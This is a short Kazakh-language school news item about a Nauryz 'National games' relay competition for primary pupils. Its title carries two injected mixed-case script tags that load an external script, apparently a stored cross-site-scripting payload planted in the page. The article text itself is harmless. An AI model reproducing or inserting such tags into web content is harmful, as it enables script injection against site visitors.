«Ұлттық ойындар» сайысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
19.03.2020
Спорттың адам өмірінде алатын орны зор екендігін бәріміз білеміз. Салауатты өмір салтымен тұрақты түрде айналысқан адамның денсаулығы мықты, ағзасы шыдамды болатындығы баршамызға белгілі. Демек біздің ата-бабаларымыз «тәні саудың – жаны сау» екенідігін бекер айтпаған. Ұлттық мәдениет пен қазақ халқының дәстүрлерін насихаттау, салауатты өмір салтын қалыптастыру мақсатында Ғ.Әбдірахманұлы атындағы Қима орта мектебінде Ұлыстың Ұлы күні «Наурыз мерекесіне» орай 1-4-сыныптар арасында «Көңілді сөре» 12 наурыз күні өткізілді. Жауапты: дене шынықтыру пәнінің мұғалімі-Аширханов Дәулет Рамазанович. Жарыс өте қызықты ұйымдастырылған. Бұл бәсекеге бес команда қатысып, кім жылдам, допты жеткізу, допты шеңберге лақтыру, қол күресі, қораз, арқан тарту сияқты эстафеталар бойынша бақтарын сынады. Әр спорт түрінен жарыстың тәртібі бойынша төрешілер алқасының отырысында нәтижесі анықталып, жүлделі орынға ие болған командалар мектеп директорының мадақтау қағазымен марапатталды.